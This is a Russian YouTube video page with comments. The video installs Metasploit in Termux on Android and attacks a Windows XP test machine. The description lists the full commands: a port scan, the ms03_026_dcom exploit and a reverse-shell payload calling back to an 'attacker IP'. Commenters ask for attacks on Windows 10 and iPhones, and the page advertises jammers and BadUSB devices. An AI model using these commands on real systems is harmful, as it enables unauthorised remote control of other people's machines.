Metasploit: Framework для проверки систем на защищенность | UnderMind
Ғылым және технология
✓ Наш паблик в Телеграме: t.me/under_public
✓ Чат в Телеграме: t.me/UnderChats
● В этом ролике: Я расскажу вам про Termux, Metasploit Framework и Android. Я решил попробовать установить Metasploit на Android без root прав, и проверить, будет ли этот Metasploit тем же самым? Или же его функционал будет сильно ограничен?
Так же мы проверим на защищенность мой тестовый компьютер на Windows XP.
-------------------------------------------------------------------------
● Команды из ролика:
pkg update
pkg install unstable-repo
pkg install metasploit
msfconsole
db_status
git init
use auxiliary/scanner/portscan/tcp
set PORTS 1-5000
set RHOSTS 192.168.88.161
run
search dcom
use exploit/windows/dcerpc/ms03_026_dcom
set payload windows/shell_reverse_tcp
show options
set RHOSTS 192.168.88.161 (IP той машины, которую будем проверять на защищенность)
set LHOST 192.168.88.247 - IP злоумышленника
run
cd ..\..\
echo Hello! (кнопка стрелки на Ю) achtung.x
----------------------------👇 Разверни 👇----------------------------
🔥 Наши Телеграм-каналы 🔥 - t.me/under_channels
✓ Наш второй канал: vk.cc/9Nuba7
✓ Паблик в ВК: vk.cc/aby9hC
✓ Чат в ВК: vk.cc/abxUPr
✓ Паблик в Телеграме: t.me/under_public
✓ Чат в Телеграме: t.me/UnderChats
-------------------------------------------------------------------------
● Помочь каналу и получить помощь в любых вопросах: donationalerts.com/r/undermind
● Стать спонсором канала: kzread.infojoin
● Я ВКонтакте: TheUnderMind
● Реклама на канале: bit.ly/2THIswk
----------------------------------------------------------------------
👉 Лучшие товары на Алике для ✖️aЦkера:
✓ Мой хаЦкepcкий смартфон для Kali Linux (Nethunter и поддержкой правильного ядра) - alii.pub/6co9up
✓ Лучший WiFi Адаптер - Аналог Alfa AWUS (работает в Kali Linux и Nethunter): alii.pub/6cobvt
✓ ХаЦкерские часы-деаутентификатор с WiFi: ali.pub/4hhw62
✓ НасkRF Оnе - лучший SDR: alii.pub/6co9v3
✓ Маленькая Bluetooth-клавиатура с подсветкой: ali.pub/4hhwwp
✓ USB порт для вашего смартфона (OTG Micro USB): alii.pub/6co9va
✓ WiFi Jаmmеr на ESP8266 (Глушилка-Деавторизатор WiFi): goo.gl/i7VHWP
✓ Злo Кaбель (BadUSB): ali.pub/4hhyo3
✓ Raspberry PI ZERO 2 W (можно сделать xaцk-станцию): alii.pub/6coati
✓ Ruby Ducky BadUSB (XaЦkepcкий девайс в виде флешки): alii.pub/6co9vo
✓ USB to Ethernet адаптер: ali.pub/4hhxux
✓ Разветвитель USB порта 1 в 4: alii.pub/6co9vv
✓ Дубликатор RFID ключей и карт: alii.pub/6co9w2
✓ Дубликатор RFID / NFC, редактор кодов: ali.pub/4hhy1q
✓ Недорогие, но очень мощные рации: goo.gl/dKibg5
✓ Недорогой, но мощный WiFi адаптер: ali.pub/5gr2ls
✓ Микро камера: alii.pub/6co9w9
✓ Клавиатуры с подсветкой для ПК: ali.pub/4hhyav
✓ Коврик для мыши с подсветкой: ali.pub/5gr2o4
✓ Набор для подсветки ПК: alii.pub/6cob3m
----------------------------------------------------------------------
● В ролике "Metasploit: Framework для проверки систем на защищенность | UnderMind" - я рассказываю вам о том, что такое Metasploit Framework. В этом ролике я рассказываю более подробней о Metasploit Project, и рассказываю о том, как установить Metasploit Framework на Android. Устанавливать его мы будем в Termux. А сам термукс - оказался наудивление интересным инструментом, ведь он даже не требует root прав! Но о нем как-нибудь в другой раз.
● Kali Linux - это обычная Операционная Система (ОС) для специалистов по защите информации. Эта ОС нигде не запрещена и есть в открытом доступе (не в даркнете). Все утилиты, которые в ней есть, предназначены для тестирования своих сетей и систем на защищенность. Автор ролика ни в коем случае не побуждает вас к созданию и использованию любого ПО в противозаконых целях! Данный ролик носит образовательный характер с точки зрения информационной безопасности, и призван повысить Вашу бдительность при обеспечении защиты информации.
● Данный ролик - художественный вымысел автора, монтаж, фотошоп и постанова. Всё рассказанное в ролике - является авторской выдумкой. Всё происходящее в видео - выполнено используя монтаж, и к реальной жизни не имеет никакого отношения. Любые совпадения наименований программного обеспечения (ПО), названий ПО и либо каких-либо других продемонстрированных фактов и событий в ролике - не более чем совпадение и полная случайность.
-------------------------------------------------------------------------
● Дополнительные хештеги: #kali #termux #metasploit #линукс #ubuntu #wifi #компьютер #pc #undermind #under #mind #андер #андермайнд
Пікірлер: 964
*Простой материал, да. Хотите больше метасплоита? Может Windows 7 проверим на защищенность? Или 10? А может быть "сверхзащищенный" iPhone? Как вам такое?* ● Команды из ролика: pkg update pkg install unstable-repo pkg install metasploit msfconsole db_status git init use auxiliary/scanner/portscan/tcp set PORTS 1-5000 set RHOSTS 192.168.88.161 - это IP той машины, которую будем проверять на защищенность run search dcom use exploit/windows/dcerpc/ms03_026_dcom set payload windows/shell_reverse_tcp show options set RHOSTS 192.168.88.161 set LHOST 192.168.88.247 - это у нас IP злоумышленника run #ГОТОВО! cd ..\..\ echo Hello! > achtung.x И вообще, теперь можно вводить любую команду, как в обычном cmd.exe
@lime9603
4 жыл бұрын
Го попробуем 10 Винду взломать тема кстати годная для новичка лайк
@MineSurv44
4 жыл бұрын
Давай Windows 10. Интересно проверить систему, которую постоянно пичкают обновлениями.
@noname-lg1eq
4 жыл бұрын
не работает (метосплоит не ставится)
@MokiHack
4 жыл бұрын
АЙФОН ДАВАЙ АЙФОН ПОЖАЛУЙСТА!!!!
@asbelous
4 жыл бұрын
Десяточкой интересно бы побаловаться
Не взлом, а тест на проникновение!
@lemon4ik_ytusv703
4 жыл бұрын
Если уметь им пользоваться можно очень много беды людям принести
@vanyazveruga1533
4 жыл бұрын
Bad Boy купить монитор)
@khachatryan7034
4 жыл бұрын
не Хакер а спейциалист по информацыонной безопасности
@tak1zawa207
3 жыл бұрын
@@user-ll6ot5fx1u учи Линукс все будет ок
@Toni-kd3gz
3 жыл бұрын
есть пробитие
Under, четкий видос, го лайк на коммент, больше темрукса значит больше лучшего контента! Press F to Respect
@gigger-nigga
4 жыл бұрын
F
@dyr4chy0
4 жыл бұрын
pay respect***
@absolutespectrum
3 жыл бұрын
FffffffffffffffffffffF
@user-qv5qj4dz9l
3 жыл бұрын
Press F to pay respect*) Termux*(Термукс*)
Metasploit: Framework - огонь, было бы роскошно увидеть серию видосов))
@mrhakcer2895
4 жыл бұрын
Плюсую
@b1rd316
4 жыл бұрын
согласен
@2stupidboi
4 жыл бұрын
+
@gnot7900
2 жыл бұрын
Уже есть канал такой канал, на 40 видео о метасплоите)
@papochka3416
2 жыл бұрын
@@gnot7900 какой
О видос про Termux. Респект)
Ааа спасибо Андер, долго ждал видео о метасплоите
Желательно больше роликов про termux, т.к. не каждая утилита с линукс в нём работает, и нужно искать замену, разбираться и д.т. А когда это показано, рассказано и прогкглино, и тебе удобно и автору просмотр и лайк)
@w1ndow
7 ай бұрын
Он сделал тг канал
Красавчик, делаешь вещи . Интересно очень , и подача информации очень нравится смотрю на одном дыхании ! Спасибо тебе!
Убойные у тебя ролики! Весь день смотрю! Все грамотно и понятно исполняешь! Ждем еще с этой темой!
респект за пример пентеста. классное объяснение. Жги еще. Единственное что надо, это объяснить откуда взялось "search dcom"
@time2517fg
4 жыл бұрын
Ну это прям слишком будет разжеванное видео, всё команды можно найти в интернете
@user-bs5hv7bw6u
4 жыл бұрын
Просто он заранее знал что будет искать дком, ибо это самый распространённый и самый лёгкий способ для XP.
@dd-de6gi
4 жыл бұрын
Ну сеарч деком эть поиск этого эксплоита как по мне
Спасибо за хороший контент. Буду ждать следующие видео
Спасибо за контент!! Очень круто)
Как раз начал изучать метасплоит, но нормальных статей не нашел, только как установить... Спасибо огромное! Жду серию видео.
@DyaDyaFedor
4 жыл бұрын
Алёша Алёша кинь, если не трудно, а то одно говно в инете, мало годного
@DyaDyaFedor
4 жыл бұрын
.......
Привет, давай больше роликов про термукс без рут прав, очень качественный контент делаешь. Заранее спасибо))
Побольше лайкосов тебе друг. Видос запилил годный! Спасибо разъяснил всё четко и по полкам! Го проверим инф.безопасность android
Жду продолжения,интересная тема!
Отсылка к сериалу Мистер Робот(оставь меня сдесь)первый сезон, и серия вроде тоже первая)))))в прошлом видео была цикада))что же дальше?
@it-coding
4 жыл бұрын
Нахрен общество
@A1ekS.
3 жыл бұрын
Ооооооо даа корпорация зло
Го полный гайд с полным описанием каждой команды и лучшее их применение.
Ролик шикарный, лайк однозначно, подписан давно, чел просто мощь💪💪🔥😎😎🔥
Наконец-то видос с термукс, я очень долго ждал
Я правильно услышал? -Аиркрэк в термукс в режиме монитора, да и даже без рут прав?????? Или это через малину?
@TheUnderMind
4 жыл бұрын
Я просто лайкну, а вы там сами додумывайте варианты))
@AnonYunus0x51
4 жыл бұрын
@@TheUnderMind окей)) чёт интересно стало)
@flux2594
4 жыл бұрын
Через малину, на обычном андроид смарте не получится, нужно подходящее ядро и рут соответственно. Много гемора. Проще купить малину, накатить на нее кали, подсоединить альфу и коннектиться по vnc
@storf277
4 жыл бұрын
У меня не получилось без рута юзать аиркрэк в режиме монитора в термуксе.
@versonind8197
4 жыл бұрын
Нет, без рут не получится, я пробовал
3:36 Тут следовало бы упомянуть, что не у всех есть такая клава, и чтобы остановить команду, нужно нажать "Кнопка громкости + C" (на англ. раскладке | точно не помню, какая кнопка) (узнал на своём опыте :D)
@ph1myfet
4 жыл бұрын
H 336 прямо в термукс можно
@user-ij1yi2ri7h
3 жыл бұрын
Hackers keyboard? Тут есть и контрол и альт и прочее
Вижу новый видос, бегу через весь город домой чтоб посмотреть!
Over - ватсап не защищён UnderMind - пентагон не защищён
@user-mg3cz8kb9k
4 жыл бұрын
Как по мне они идут на равных, и у овера больше опыта
@user-ns8yy5hk5h
4 жыл бұрын
Овер ламер, не думаю что он пиздец какой опытный.....И спустя пол года, я понял что Андер просто за счёт подачи вывозит, нагло спижженной у Яна Топлеса. Он снимает видосы по статьям из телеграмма, опыта тут и не надо 💁♂️
@zzabolazza635
4 жыл бұрын
@@user-mg3cz8kb9k У Ундер Муинда есть образование в этой теме, а Овер сам все изучает
@user-mg3cz8kb9k
4 жыл бұрын
@@zzabolazza635 Человек без оброзования может быть умне человека с оброзованием, но Овер и Андер одинаково увны в теме Кальки, к стати овер снял рубрику Кальки с канала ...
@Oracule-bh5vy
4 жыл бұрын
Овер ламер ! АндерМинд опытный
E: Unable to locate package metasploit
@ggb8833
3 жыл бұрын
такая же ситуация
@xoma9625
3 жыл бұрын
@@sfsshik1307 как?
@Painkiller413
2 ай бұрын
У меня тож также
Спасибо, под прошлым роликом я писал комментарий и на него мне ответили видео)) не зря колокольчик стоит))) +
Как обычно-все четко. Мне почти 50, но я учусь у молодых. Kali linux узнал год назад, очень интересно.
under ,но ведь сейчас мало кто использует win xp ,и к тому на него легко найти exploit ,может покажешь нам как законнэктиться к вин 7 или выше?\)))
@chertstudio
4 жыл бұрын
Напиши в ютубе enternal Blue ms_17
Драсте снова. Если у вас после 2-го и последующих запусков при вводе db_status выводится No connection, то вот какие комманды надо использовать, чтобы устранить это: mkdir -p $PREFIX/var/lib/postgresql initdb $PREFIX/var/lib/postgresql pg_ctl -D $PREFIX/var/lib/postgresql start Заново запускаем Metasploit и все! Проблема решена!
@mort1s105
4 жыл бұрын
мужик не помогло
Ещё интересно услышать про сдр, попробуй тестовый ролик, а там как пойдёт. Удачи 🤞
Спасибо! Очень интересная информация!
Интересненько!👍
Народ, чтобы хакнуть винду 10 через метасплоит, шанс равен ниже нуля, порты закрыты, взломать можно тока если система безопасности стоит старая (то есть не обновленная) так же антивирус блокнет ваш порт чек
@sos1skaee783
3 жыл бұрын
так же во время проверки портов, антивирус спалит ваш IP-адрес в этой сети
Жду не дождусь новых видео про термукс
Раньше я занималась компьторами, и сейчас когда есть время стараюсь разобраться сама с телефоном: внуки тврят.очень много роликов хорошихи нужеые. Вам респек. Молодцы
Идея для видео: Свисток на термукс. Для wifite например. У меня не получилось
@Timur13240
4 жыл бұрын
Нужен рут и ядро, проще тогда поставить нет Хантер или андракс
@undefined1777
4 жыл бұрын
Термукс - хрень в плане атак на WiFi/Bluetooth.
@user-tr8rz9up1s
4 жыл бұрын
@@undefined1777 да, но удобство никто не отменял)
@romrom2497
4 жыл бұрын
не парься этой фигней, это все треш... аппарат себе сломаешь
все ок до момента exploit, у меня в конце пишет Exploit completed, but no session was created, и после возвращает назад...
@user-ld1gz1cr1j
3 жыл бұрын
тоже самое( Правда, я десятку хотел крякнуть)) Получилось у тебя??
@user-ce3ii7ug2o
3 жыл бұрын
Эксплоит завершён,но сессия не была создана.
@itsmakar2412
3 жыл бұрын
Ты сделал чтото не так
@MrMoringo2005
3 жыл бұрын
У меня так же, что делать??
@itsmakar2412
3 жыл бұрын
@@MrMoringo2005 у ос которую ты хотел хакнуть уже исправлен эксплоит
очень хороший видос у меня понравился Спасибо😍
Очень интересно! Продолжай)
Сделай видос про hack rf (и в целом sdr)
@hederinov
4 жыл бұрын
+
Дед: - Бабка, а помнишь как у меня в сорок четвёртом ноги болели? - Помню, родненький, помню! - А я сорок пятый купил - и не болят!
Хочу продолжение, очень понравилось)))
Супер) Как всегда просто и полезно) Ждём видео про Termux)))
8:30 ( взлом жопы )
Ого, даже не имея рут права можно натворить делов! Действительно в правильных (ровных,не кривых)руках много чего интересного можно делать.
Зачетище!!! Грамотно,толково...
Полезный видос, жду продолжения
У меня не определяет местонахождение metosploit и install unstaled-repo что делать?
@ges7705
3 жыл бұрын
+
@KENNYPROG
3 жыл бұрын
У меня тоже
Exploit copmleted, but no session was created.... ну как после такого жить
@nikolaykiseleov3367
4 жыл бұрын
Я до конца не понял ... Атакуемая машина должна быть включена? Один раз получилось установив 135 порт set RPORTS 135.. сессия была создана но команды не выполнялись...
@saidyuldashev5469
4 жыл бұрын
У меня тоже эта ошибка как ее решить?
@fsociety7825
4 жыл бұрын
@@saidyuldashev5469 чёрт, я не знаю....не как руки не доходят.....если узнаешь отпишись пж🙏
@youroman
4 жыл бұрын
Кто решил ?
@user-xm6ff7bz7w
4 жыл бұрын
тоже самое
Очень жду новых видосов на проверку новых систем и самого андроида.
спасибо, братан! кайфанул от инфы
Го один день из твоей жизни ?)
Уважаемый ,по возможности- сделай ролик по использовании оболочки (shell)...
@chertstudio
4 жыл бұрын
Shell = ssh xd
Больше видео на тему про Metasploit!
Больше про метамплойт 🤸♂️🤸♂️🤸♂️🤸♂️🤸♂️
У меня у одного пакеты не находились ?)
@nickolauskaskas
3 жыл бұрын
У меня не нашел ни unstable-repo, ни соот-нно metasploit
@user-xm6pz3qw8c
2 жыл бұрын
У меня была такая проблема но я его легко исправил но надо ждать 2-3 часа
@user-xm6pz3qw8c
2 жыл бұрын
@Lil Crippie эт легко
@user-xm6pz3qw8c
2 жыл бұрын
@Lil Crippie но придется ждать 2-3 часа зависит от инета ты готов ждать?
@user-xm6pz3qw8c
2 жыл бұрын
@Lil Crippie ну ок я щас те дам ссылку там делаеш все как делает он
А также можно использовать эксплойт eternalblue (ms17_010)
@Timur13240
4 жыл бұрын
И новую хрень блюекип
@MrFunny01
4 жыл бұрын
Это уязва на Винде виста и 7, 8-8.1, на хп этого порта ещё не было.
@Timur13240
4 жыл бұрын
@@MrFunny01 да, я знаю, это РДП
@samuelstudio1088
4 жыл бұрын
@@MrFunny01 я пытался воспроизвести MS17_010 на 8.1 не вышло
@MrFunny01
4 жыл бұрын
@@samuelstudio1088 так там улучшенная MS17_010_8 вроде, просто напиши search ethernalblue,и там найдешь для винды 8, у меня получалось
Ждем продолжение успехов в продвижение
Поздновато но всё же лайк)
E: Unable to locate package metasploit что делать?
@dartay2893
3 жыл бұрын
Еще нужно?
@mrhaim771
3 жыл бұрын
@@dartay2893 всм?
С айфоном тема хайповая была бы, но ведь по судам затаскают (((
@mrhakcer2895
4 жыл бұрын
А ты сделай так что бы не таскали по судам)
@sierrochkabananchik
3 жыл бұрын
@@mrhakcer2895 Взломать суд👍🏿
Веб дизайн и все что с ним связано , хороший фаервол и роутер, примитивные знания программирования достаточно для ведения бизнеса в интернете. Но вообще для пентестинга это очевидно хорошая идея - атаковать свою систему всеми возможными способами и после собрать статистику. Еще очень важный фактор безопасности это контроль ваших проводов или радио связи , а так же электричество и питание вашей системы ( УПС ), т.к. есть очень дорогие инженерные программы и устройства которые способны сносить прошивку ваших устройст (к примеру PC3000). Нежелательные соседи могут испортить вам что-нибудь ^^
Благодарю, дорогой Друг! Вы прирождённый ведущий. Очень вежливый и приятный. Материал прост в подаче, интересен и полезен.
Что делать, если он не находит этот пакет?(
@darchidark
Жыл бұрын
Они выпилили весь вредоносный код от туда. У тебя ничего не получится!
- Кого это хоронят? - Да вон того мужика, который в гробу лежит…
Двигай дальше тему, очень интересно
Круто делаешь, жду продолдения
Андер, Exploit completed, but no session was created, в чем дело?
@alsychev7446
3 жыл бұрын
это значит система слишком защищенная
@somebody_exe1840
3 жыл бұрын
@@alsychev7446 нет, это вообще не из-за этого
@deadfamhvh
3 жыл бұрын
@@somebody_exe1840 а из за чего тогда, а?
@somebody_exe1840
3 жыл бұрын
@@deadfamhvh нужно прописать кое - что еще, тк metasploit переделали, и теперь он не создаёт саму сессию. Вот pg_ctl -D /data/data/com.termux/files/usr/var/lib/postgresql -l logfile start, пропиши это в новой сессии, потом запускай метасплоит в другой. Мне помогло
@deadfamhvh
3 жыл бұрын
@@somebody_exe1840 ок спасибо
Sending exploit ... [*] Exploit completed, but no session was created. Хэлп, не пойму чё за дела
@user-sy5de6mo7g
4 жыл бұрын
У меня та же проблема. Ты не нашёл решение?
@user-mf1fw8wl4o
4 жыл бұрын
@@user-sy5de6mo7g pg_ctl -D /data/data/com.termux/files/usr/var/lib/postgresql -l logfile start веди это в новой сессии , и в другой включай metasploit
@user-mf1fw8wl4o
4 жыл бұрын
pg_ctl -D /data/data/com.termux/files/usr/var/lib/postgresql -l logfile start веди это в новой сессии , и в другой включай metasploit
@user-sy5de6mo7g
4 жыл бұрын
Спс
@user-xm6ff7bz7w
4 жыл бұрын
@@user-mf1fw8wl4o у тебя тоже такая ошибка была?
Спасибо, информативно)
Жду продолжения)
Теперь 13 летных хакеров станет больше
@chpukich2285
2 жыл бұрын
Да)
Привет андер моём пк доктор веб обнаружил виру троян Я её удалил но сомневаюс всё кончено с вирусом в В ТОП ПЛИЗ
@puffysampmobile3671
4 жыл бұрын
Ну сматри ьереш малаток и никааумхих вирумов в жизниинет!
Супер , ПРОДОЛЖАЙ !
Никогда не думал что мой телефон без специального софта может такое... Ждём второй части!
Расскажи про 445-й порт. Постоянные атаки на него идут.
Возрождай рубрику) ждееем
Нужно больше видео про Termux ! PLS
Большая работа проделана, молодец
Ого а я и не знал об этом, спасибо миша
@katyashkaa7453
4 жыл бұрын
Пожалуйста Игорь
@user-rg5ev6ck4k
4 жыл бұрын
@@katyashkaa7453 дада, саня
я конечно знал что взломать и нанести вред жертве достаточно легхо но не думал что настолько. Хотя бы теперь свои устройства защишю
Хочу видео про то как закрывать порты, и когда уже будет смартфон как в watch dogs:))
Интересное видео... Давай продолжение...
Режим ожидания серии видео про метасплоит
было бы роскошно увидеть серию видосов
Оо видос про термукс уважуха тебе
Кроссавчег! Научи меня мастер .
Где в сканнере написанно что 135тый порт это dcom? Или я на изусть должен всё знать? Правильно, используйте нмап с ключем sV и скриптом от vulners А вот как ты используешь второй телефон как клавиатуру к первому это действительно интересно.
Like deserve, :) good content.
Продолжай эту тему)
На планшет , допустим Хуавей,леново, вариант поставить kali linux? Или андракс? Не могу определиться что купить для этого) на телефон не хочется
КРАСАВЧИК БОЛЬШЕ МЕТАСПЛОЙТА
Видео класс на китайском самом дешевом варианте андроид 7 ( as-502) все равно работает))
Есть идея только цссс.... Как насчет удаленной загрузки файлов на машину, будет очень удобно, если я далеко от своего пк и хочу отправить туда фото или заметку, что-то вроде удаленного backup'a.
Андрэр оставь пожалуйста список команд что бы можно было самому все посмотреть и попробовать а то учить все эти команды как то не в каеф.
А как все же перейти в режим мониторинга, без стороннего Wi-Fi адаптера?
А как проверить другие порты и где их искать (СКРИПТ ДЛЯ КАЖДОГО ПОРТА)
Все Смотрю твои видео в ознакомительных целях
3:00 ДА 10 МИНУТ, Я ЧАС ЖДАЛ
Блин, подскажи пожалуйста, когда ты сказал не забывать про таб, его надо нажать или как?